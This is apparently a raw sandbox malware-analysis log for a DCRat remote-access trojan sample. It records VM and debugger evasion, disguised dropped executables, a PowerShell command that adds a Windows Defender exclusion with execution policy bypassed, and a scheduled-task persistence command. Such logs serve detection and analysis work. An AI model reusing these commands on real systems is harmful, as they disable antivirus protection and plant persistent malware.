              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
              Source: C:\Users\user\Desktop\cougif6lqM.exeMemory allocated: 14D0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeMemory allocated: 1B160000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeMemory allocated: 1420000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeMemory allocated: 1B270000 memory reserve | memory write watchJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeMemory allocated: 2960000 memory reserve | memory write watchJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeMemory allocated: 1ABE0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\cmd.exeMemory allocated: 750000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exeMemory allocated: 1A480000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exeMemory allocated: 13B0000 memory reserve | memory write watch
              Source: C:\Users\user\cmd.exeMemory allocated: 1B110000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeMemory allocated: EA0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeMemory allocated: 1ABF0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeMemory allocated: 13B0000 memory reserve | memory write watch
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeMemory allocated: 1AD90000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeMemory allocated: B40000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeMemory allocated: 1A770000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeMemory allocated: 1750000 memory reserve | memory write watch
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeMemory allocated: 1B370000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\cougif6lqM.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWindow / User API: threadDelayed 7407Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeWindow / User API: threadDelayed 2445Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeWindow / User API: threadDelayed 804Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeWindow / User API: threadDelayed 1451Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9255
              Source: C:\Users\user\cmd.exeWindow / User API: threadDelayed 363
              Source: C:\Users\user\cmd.exeWindow / User API: threadDelayed 364
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeWindow / User API: threadDelayed 361
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeWindow / User API: threadDelayed 367
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeWindow / User API: threadDelayed 366
              Source: C:\Users\user\Desktop\cougif6lqM.exe TID: 7304Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe TID: 4316Thread sleep time: -33204139332677172s >= -30000sJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7600Thread sleep count: 804 > 30Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7600Thread sleep count: 1451 > 30Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -4611686018427385s >= -30000s
              Source: C:\Users\user\cmd.exe TID: 7372Thread sleep count: 363 > 30
              Source: C:\Users\user\cmd.exe TID: 7328Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\cmd.exe TID: 7464Thread sleep count: 364 > 30
              Source: C:\Users\user\cmd.exe TID: 7852Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 6816Thread sleep count: 361 > 30
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 7324Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 2376Thread sleep count: 367 > 30
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe TID: 7480Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 1544Thread sleep count: 366 > 30
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 8076Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 2624Thread sleep count: 337 > 30
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe TID: 1876Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
              Source: C:\Users\user\cmd.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\cmd.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeFile Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F0A5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,3_2_00F0A5F4
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,3_2_00F1B8E0
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2AAA8 FindFirstFileExA,3_2_00F2AAA8
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1DD72 VirtualQuery,GetSystemInfo,3_2_00F1DD72
              Source: C:\Users\user\Desktop\cougif6lqM.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\cmd.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeThread delayed: delay time: 922337203685477
              Source: DCRatBuild.exe, 00000003.00000003.1332983655.0000000003080000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
              Source: wscript.exe, 00000004.00000003.1337275179.0000000000778000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}$
              Source: javaclient.exe, 00000002.00000002.3771177110.000000001BFD0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeAPI call chain: ExitProcess graph end nodegraph_3-24384
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F2866F
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2753D mov eax, dword ptr fs:[00000030h]3_2_00F2753D
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2B710 GetProcessHeap,3_2_00F2B710
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Users\user\cmd.exeProcess token adjusted: Debug
              Source: C:\Users\user\cmd.exeProcess token adjusted: Debug
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess token adjusted: Debug
              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exeProcess token adjusted: Debug
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1F063 SetUnhandledExceptionFilter,3_2_00F1F063
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1F22B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00F1F22B
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F2866F IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F2866F
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1EF05 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00F1EF05
              Source: C:\Users\user\Desktop\cougif6lqM.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Adds a directory exclusion to Windows Defender
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'Jump to behavior
              Bypasses PowerShell execution policy
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\javaclient.exe "C:\Users\user\AppData\Local\Temp\javaclient.exe" Jump to behavior
              Source: C:\Users\user\Desktop\cougif6lqM.exeProcess created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe "C:\Users\user\AppData\Local\Temp\DCRatBuild.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\javaclient.exe'Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /fJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess created: unknown unknownJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Componenthost\aZjsojBpBtPKe.vbe" Jump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Componenthost\N1me8mpFe7zJQMouCBhkn06ZkahUl.bat" "Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Componenthost\providerreviewdhcp.exe "C:\Componenthost\providerreviewdhcp.exe" Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8o9UezPTg6.bat" Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Windows\System32\cmd.exeProcess created: unknown unknown
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: 3_2_00F1ED5B cpuid 3_2_00F1ED5B
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeCode function: GetLocaleInfoW,GetNumberFormatW,3_2_00F1A63C
              Source: C:\Users\user\Desktop\cougif6lqM.exeQueries volume information: C:\Users\user\Desktop\cougif6lqM.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeQueries volume information: C:\Users\user\AppData\Local\Temp\javaclient.exe VolumeInformationJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeQueries volume information: C:\Componenthost\providerreviewdhcp.exe VolumeInformationJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
